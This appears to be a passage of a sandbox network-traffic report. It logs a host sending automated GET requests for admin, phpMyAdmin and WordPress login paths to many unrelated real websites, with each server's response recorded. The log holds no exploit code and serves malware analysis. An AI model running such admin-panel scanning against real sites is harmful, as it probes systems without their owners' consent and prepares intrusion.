                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://academico.um.edu.mx/academico/phpMyAdmin/">here</a>.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at academico.um.edu.mx Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
349 | 192.168.2.6 | 61895 | 87.233.198.20 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:06.654476881 CET | 187 | OUT | GET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: idp.uitgeverij-deviant.nl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.849292040 CET124INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                location: https://idp.uitgeverij-deviant.nl/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port
350 | 192.168.2.6 | 61891 | 13.248.169.48 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:06.660784960 CET | 173 | OUT | GET /admin HTTP/1.1
Host: secure.vexcorp.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.988056898 CET | 1190 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Mon, 05 Feb 2024 11:16:06 GMT
Content-Type: text/html
Content-Length: 315
Last-Modified: Mon, 29 Jan 2024 23:30:02 GMT
Connection: keep-alive
ETag: "65b834fa-13b"
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_HgGLa2ZqsCpCEK8zzb/jbfkVJQcEj7nNxsDThlwrEpzbE9yR2GhYIKzKBPjdoTl7Qia4M0KP1O5IVRwpqQqwcQ
Cache-Control: no-cache
X-Content-Type-Options: nosniff
Set-Cookie: caf_ipaddr=81.181.57.74;Path=/;Max-Age=86400;
Set-Cookie: country=RO;Path=/;Max-Age=86400;
Set-Cookie: city="";Path=/;Max-Age=86400;
Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400;
Set-Cookie: expiry_partner=;Path=/;Max-Age=86400;
Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400;
Accept-Ranges: bytes
Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.js"></script></head><body><div id="root"></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
351 | 192.168.2.6 | 61930 | 54.71.181.160 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:06.668267965 CET | 176 | OUT | GET /admin HTTP/1.1
Host: ucivirtual.uci.edu.mx
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.840606928 CET | 365 | IN | HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: http://ucivirtual.uci.edu.mx/admin/
Server: Microsoft-IIS/10.0
Date: Mon, 05 Feb 2024 11:15:21 GMT
Content-Length: 158
Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="http://ucivirtual.uci.edu.mx/admin/">here</a></body>
Feb 5, 2024 12:16:06.840826035 CET | 177 | OUT | GET /admin/ HTTP/1.1
Host: ucivirtual.uci.edu.mx
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:08.159965992 CET | 960 | IN | HTTP/1.1 303 See Other
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Language: es-mx
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://ucivirtual.uci.edu.mx/admin/index.php?cache=1
Server: Microsoft-IIS/10.0
X-Powered-By: PHP/7.2.7
X-Accel-Buffering: no
Set-Cookie: MoodleSession=4lsrugirns1q6gvf0q6tng7mua; path=/
Date: Mon, 05 Feb 2024 11:15:23 GMT
Content-Length: 499
Data Ascii: <!DOCTYPE html><html lang="es-mx" xml:lang="es-mx"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Redireccionar</title></head><body><div style="margin-top: 3em; margin-left:auto; margin-right:auto; text-align:center;">Esta página debería redireccionar automáticamente. Si no ocurre nada, por favor utilice el enlace de continuar que aparece más abajo.<br /><a href="http://ucivirtual.uci.edu.mx/admin/index.php?cache=1">Continuar</a></div></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.160834074 CET244OUTGET /admin/index.php?cache=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucivirtual.uci.edu.mx
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: MoodleSession=4lsrugirns1q6gvf0q6tng7mua
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:08.476466894 CET | 882 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es-mx
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: http://ucivirtual.uci.edu.mx/login/index.php
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.2.7
                                                                                                                                                                                                                                                                                                                                                                X-Accel-Buffering: no
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:23 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 491
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="es-mx" xml:lang="es-mx"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Redireccionar</title></head><body><div style="margin-top: 3em; margin-left:auto; margin-right:auto; text-align:center;">Esta pgina debera redireccionar automticamente. Si no ocurre nada, por favor utilice el enlace de continuar que aparece ms abajo.<br /><a href="http://ucivirtual.uci.edu.mx/login/index.php">Continuar</a></div></body></html>
Feb 5, 2024 12:16:08.476685047 CET | 236 | OUT | GET /login/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucivirtual.uci.edu.mx
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: MoodleSession=4lsrugirns1q6gvf0q6tng7mua
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:08.923787117 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private, pre-check=0, post-check=0, max-age=0, no-transform
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es-mx
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.2.7
                                                                                                                                                                                                                                                                                                                                                                Content-Script-Type: text/javascript
                                                                                                                                                                                                                                                                                                                                                                Content-Style-Type: text/css
                                                                                                                                                                                                                                                                                                                                                                X-UA-Compatible: IE=edge
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:23 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 29840
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr" lang="es-mx" xml:lang="es-mx"><head> <title>UCI Virtual: Ingresar al sitio</title> <link rel="shortcut icon" href="http://ucivirtual.uci.edu.mx/theme/image.php/boost/theme/1656634060/favicon" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="keywords" content="moodle, UCI Virtual: Ingresar al sitio" /><link rel="stylesheet" type="text/css" href="http://ucivirtual.uci.edu.mx/theme/yui_combo.php?rollup/3.17.2/yui-moodlesimple-min.css" /><script id="firstthemesheet" type="text/css">/** Required in order to fix style inclusion problems in IE with YUI **/</script><link rel="stylesheet" type="text/css" href="http://ucivirtual.uci.edu.mx/theme/styles.php/boost/1656634060_1/all" /><script type="text/javascript">//<![CDATA[var M = {}; M.yui = {};M.pageloadstartti


Session ID | Source IP | Source Port | Destination IP | Destination Port
352 | 192.168.2.6 | 61886 | 185.51.191.48 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:06.673520088 CET | 179 | OUT | GET /admin HTTP/1.1
Host: innovationdevelopment.eu
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.896759033 CET | 540 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:16:05 GMT
Server: Apache
Location: http://innovationdevelopment.eu/admin/
Cache-Control: max-age=2592000
Expires: Wed, 06 Mar 2024 11:16:05 GMT
Content-Length: 246
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://innovationdevelopment.eu/admin/">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
353 | 192.168.2.6 | 61912 | 185.51.191.48 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:06.699532032 CET | 185 | OUT | GET /PhpMyAdmin/ HTTP/1.1
Host: innovationdevelopment.eu
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.000343084 CET | 1286 | IN | HTTP/1.1 200 OK
Date: Mon, 05 Feb 2024 11:16:05 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=49d0abf6993c163efecba1974d36e1b3; expires=Tue, 06-Feb-2024 11:16:06 GMT; Max-Age=86400; path=/
Set-Cookie: VISITORID=6f23480ee7ffaf87556eb25c893227a7; expires=Tue, 06-Feb-2024 11:16:06 GMT; Max-Age=86400
Upgrade: h2,h2c
Connection: Upgrade, close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Data Ascii: 3362<!DOCTYPE html>... Created by excore - Snake v1.808 - dobos.oliver@nsinfo.hu --><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://ogp.me/ns/fb#"><head><title>Innome</title><link rel="stylesheet" href="/css/system.css?v=1.808" /><link rel="stylesheet" href="/css/flags.css?v=1.808" /><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black" /><meta name="MobileOptimized" content="width" /><meta name="HandheldFriendly" content="true" /><meta http-equiv="cleartype" content="on" /><meta name="twitter:card" content="summary_large_image"><meta http
Feb 5, 2024 12:16:07.000364065 CET | 1286 | IN
Data Ascii: -equiv="Content-Type" content="text/html; charset=UTF-8" /><link rel="stylesheet" href="/sites/default/css/main.css?v=1.808" /><link rel="stylesheet" media=print href="/sites/default/css/print.css?v=1.808" /><link rel="styleshee
Feb 5, 2024 12:16:07.000406981 CET | 1286 | IN
Data Ascii: <script type="text/javascript" src="/js/jquery/ui/jquery.ui.effect-fade.min.js"></script><script type="text/javascript" src="/js/jquery/ui/jquery.ui.datepicker.min.js"></script><script type="text/javascript" src="/js/jquery/jquery.auto
Feb 5, 2024 12:16:07.000426054 CET | 1286 | IN
Data Ascii: f="http://innovationdevelopment.eu/pl/PhpMyAdmin/" /><link rel="alternate" hreflang="ro" href="http://innovationdevelopment.eu/ro/PhpMyAdmin/" /><link rel="alternate" hreflang="sk" href="http://innovationdevelopment.eu/sk/PhpMyAdmin/" />
Feb 5, 2024 12:16:07.000442028 CET | 1286 | IN
Data Ascii: cument.getElementById('ajax').src='sites/default/content/ajax/fbw.php?m=gyengenlato'"><img src="/images/fbw.gif" style="max-width:24px;max-height:24px;width:auto;height:auto;" alt="Low vision version" /></a><a href="javascript
Feb 5, 2024 12:16:07.000458956 CET | 1286 | IN
Data Ascii: Innome"><img src="images/logo.png" alt="Innome" /></a></div><div class="menu"><a href="/en/ims/what-is-it">IMS</a><a href="/en/project/about">Project</a><a href="/en/outputs/guide">Outputs</a><a href="/en/contact">
Feb 5, 2024 12:16:07.000631094 CET | 1286 | IN
Data Ascii: creen_sizes.php?w='+screen.width+'&h='+screen.height;});</script><div class="LAW_cookie_alert" style="display:block;">By using this site you agree that this site uses cookies.<br><a href="javascript:void();" onClick="LAWsetC
Feb 5, 2024 12:16:07.000648975 CET | 1286 | IN
Data Ascii: called a cookie (cookies) may place during the use of the website user's computer or mobile device, which is managed by the browser (eg. unique ID, website names, numbers and alphabetical character). <br> <b> types of cookies </ b> <br> Stora
Feb 5, 2024 12:16:07.000665903 CET | 1286 | IN
Data Ascii: sic setting cookies, but you can disable them by the user, to reject it. <br> disable the cookies are requested to make the necessary settings on the computer or mobile device Internet browser / browser's settings menu (ban, withdrawal). <br>
Feb 5, 2024 12:16:07.000682116 CET | 1286 | IN
Data Ascii: <div class="footer_title">Partners</div><div class="footer_logos"><p><img alt="" src="/ckfinder/userfiles/images/logo_nf.png" style="height:35px; width:91px" /> <img alt="" src="/ckfinder/userfiles/images/TREBAG_nagyon_uj_angol.png
Feb 5, 2024 12:16:07.023164988 CET | 830 | IN
Data Ascii: o.png" style="height:29px; width:29px" /></a></p></div><div class="footer_title">Get the latest information about the project!</div><div class="footer_newsletter"><form action="/en/newsletter" method="POST"><input


Session ID | Source IP | Source Port | Destination IP | Destination Port
354 | 192.168.2.6 | 61887 | 181.4.228.155 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:06.716140985 CET | 182 | OUT | GET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ventas.officeinsumos.com.ar
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.977626085 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/7.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource
Feb 5, 2024 12:16:06.977643967 CET | 151 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
355 | 192.168.2.6 | 61944 | 138.66.39.205 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:06.744514942 CET | 184 | OUT | GET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: login2.innova.puglia.it
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.976286888 CET | 120 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Location: https://login2.innova.puglia.it/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
356 | 192.168.2.6 | 61926 | 181.4.228.155 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:06.758858919 CET | 188 | OUT | GET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ventas.officeinsumos.com.ar
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.026426077 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/7.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource
Feb 5, 2024 12:16:07.026443958 CET | 151 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
357 | 192.168.2.6 | 62373 | 44.195.133.145 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:06.774202108 CET | 179 | OUT | GET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.889241934 CET582INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Cache-control: no-cache="set-cookie"
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://ucv.blackboard.com/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74472C5F492A4B3BEA18CC7421A779A020EDDAF7B9110B0A46B575850AB86F0E3E0AEC9356593FDDBE1D721FD3E4C0BAB24;PATH=/;MAX-AGE=900
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 175
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty/1.21.4.2</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
358 | 192.168.2.6 | 62369 | 104.18.41.153 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:06.774267912 CET | 172 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: app.plex.tv
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.920644999 CET | 311 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:16:06 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 17
Connection: keep-alive
Location: https://app.plex.tv/phpMyAdmin/
CF-Cache-Status: HIT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 850abd46a99c7bae-ATL
Data Raw: 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79
Data Ascii: Moved Permanently


Session ID | Source IP | Source Port | Destination IP | Destination Port
359 | 192.168.2.6 | 62396 | 44.199.96.179 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:06.784766912 CET | 182 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: pxndx-mcr.boletia.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.900270939 CET | 401 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:16:06 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Server: nginx/1.12.2
Location: https://pxndx-mcr.boletia.com/phpMyAdmin/
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.12.2</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
360 | 192.168.2.6 | 62403 | 170.114.52.2 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:06.789966106 CET | 174 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: gitam.zoom.us
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.933079958 CET | 1004 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:16:06 GMT
Content-Type: text/html
Content-Length: 134
Connection: keep-alive
Location: https://gitam.zoom.us/phpMyAdmin/
CF-Cache-Status: DYNAMIC
Set-Cookie: __cf_bm=9aWbkbPT4DdlgG_jg44HMc41AE1.59S3JcFtxwJ.xgU-1707131766-1-AerVx9RXy0Zm7OnurxzYuId07SlHkitQXtOcQmpWK47Y6f+CHIBXVtzdIORdzJ1w/NBTDnTUsLHOaZpdNAQ/zfs=; path=/; expires=Mon, 05-Feb-24 11:46:06 GMT; domain=.zoom.us; HttpOnly; SameSite=None
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WMZuODp3MdDIZO4COWNeiqXyNueQG%2BXKdtnxcb1B8KlT5B3RN8q8Zc0fmkF%2BmVqaTxE6E80Zm8r20r06JlijKI%2FdGVYeifJCOjw9gAd7WmGLLjxzhDWh9J8uHq1XbK8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 850abd46cdff1371-ATL
alt-svc: h3=":443"; ma=86400
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
361 | 192.168.2.6 | 62456 | 31.13.65.1 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:06.812829018 CET | 180 | OUT | GET /wp-login.php HTTP/1.1
Host: hi-in.facebook.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.914983988 CET | 214 | IN | HTTP/1.1 301 Moved Permanently
Location: https://hi-in.facebook.com/wp-login.php
Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.435920954 CET241OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: hi-in.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: https://m.facebook.com/wp-login.php?locale=hi_IN&_rdr
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.537914991 CET211INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://hi-in.facebook.com/wp-admin/
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
362 | 192.168.2.6 | 61927 | 124.237.208.37 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:06.869349003 CET | 271 | OUT | GET /wp-admin/ HTTP/1.1
Host: pan.baidu.com
Accept: */*
Accept-Encoding: deflate, gzip
Cookie: BAIDUID=EB8CC7650E617F0D35F2D5C2F1E7BC8D:FG=1
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Referer: http://pan.baidu.com/wp-login.php
Feb 5, 2024 12:16:07.628683090 CET | 271 | OUT | GET /wp-admin/ HTTP/1.1
Host: pan.baidu.com
Accept: */*
Accept-Encoding: deflate, gzip
Cookie: BAIDUID=EB8CC7650E617F0D35F2D5C2F1E7BC8D:FG=1
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Referer: http://pan.baidu.com/wp-login.php
